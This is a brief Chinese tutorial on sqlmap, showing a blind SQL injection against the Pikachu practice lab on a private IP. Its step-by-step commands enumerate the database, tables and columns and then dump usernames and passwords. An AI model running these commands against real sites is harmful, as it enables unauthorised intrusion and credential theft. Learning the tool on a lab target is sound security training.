sqlmap的使用简介

　　SQLmap是一款自动化的SQL注入工具，可以用于检测和利用SQL注入漏洞，通过Sqlmap工具可以比较轻松的获取数据库中的相关数据，以下通过一个简单的测试案例简单介绍sqlmap的使用教程:

1.通过pikachu的sql盲注提交一个url请求，请求连接为：

http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2

2.打开sqlmap软件，如果是windows端，在命令行打开sqlmap所在目录，切换盘符，cd打开路径，通过以下语句对刚才的URL进行渗透（此时要注意，sqlmap支持的python版本为python2.6或者2.7，在使用sqlmap时需要切换python的版本），此时sqlmap开始进行测试

python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php
?name=111&submit=%E6%9F%A5%E8%AF%A2"

 3.sqlmap的测试结果如下图所示：

 4.通过以下语句查看数据库的名称为pikachu

python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" --current-db

 5.在获取数据库名称后，通过数据库名称获取数据库的表，从下图的结果可以看到，数据库中所有表的名称在下面已经列出，由于我们需要知道数据库中的用户名和密码，此时需要根据表名，对列进行查询

python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

 6.输入以下数据，在表名的基础上，对列名进行查询：

python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

 7.通过以上查询，可以看到此列数据中有我们需要的用户名和密码，此时输入以下命令对用户名和密码进行获取,在下方输出中可以看到通过sqlmap输出的所有用户名和密码：

python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump

 8.以上就是sqlmap的简单用法